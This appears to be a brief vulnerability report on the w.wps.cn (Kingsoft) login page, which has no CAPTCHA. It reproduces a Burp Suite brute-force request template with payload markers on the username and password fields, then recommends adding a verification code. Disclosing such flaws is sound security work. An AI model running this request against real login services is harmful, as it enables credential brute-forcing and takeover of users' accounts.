There is no verification code at Kingsoft write logon, which can be cracked.
Simply write a document
Url: http://w.wps.cn/
There is no verification code on the login page, and there is a risk of brute-force cracking
Burp brute-force cracking
POST /docscare/webapi/login/ HTTP/1.1Host: w.wps.cnContent-Length: 57Accept: application/xml, text/xml, */*Origin: http://w.wps.cnX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://w.wps.cn/index.htmlAccept-Encoding: gzip, deflateAccept-Language: zh,zh-CN;q=0.8,en-US;q=0.6,en;q=0.4,zh-TW;q=0.2,de;q=0.2Cookie: random=0.41373136453330517user=§[email protected]§&pwd=§MTIzNDU2§&dev=kuaixie&host=w.wps.cn
Cracking accounts/passwords
Solution:
Add Verification Code